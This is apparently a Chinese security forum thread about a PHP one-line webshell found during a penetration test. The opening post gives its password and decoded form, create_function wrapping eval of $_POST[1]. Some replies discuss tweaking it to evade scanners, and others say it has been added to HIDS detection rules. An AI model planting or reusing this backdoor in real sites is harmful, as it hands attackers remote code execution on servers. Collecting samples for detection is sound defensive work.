导航

在渗透的时候 发现的前人的PHP一句话马(过河马webshell查杀)

#1
<
密码为1

用的是CreatFunction创建匿名函数
解密后是
create_function("eval($some);","@evAl($_POST[1]);");附图一张

啾啾啾啾啾~
2023-02-10
#2
哈哈,嫖了
Oc
2023-02-10
#3
收到,已加入hids规则库
凡人看山不是山
2023-02-10
#4
回复 3# PolarPeak
牛,但你这是哪家hids,我刚刚试了,有hids能检测到
2023-02-11
#5
拿过来随便改改还能继续用
2023-02-11
#6
自定义函数,改变一下还能过很多检测的
2023-02-11
#7
回复 6# xiaoyu
我刚测了一下 这个过不了d盾
2023-02-13
#8
回复 4# fogfog
甲方内部自研的引擎
2023-02-14
#9
回复 8# PolarPeak
Soga,坛子的webshell都可以搜集一下哈哈哈  动态对抗
2023-02-14
#10
回复 9# fogfog
基本上全加规则了,自研引擎+商业引擎。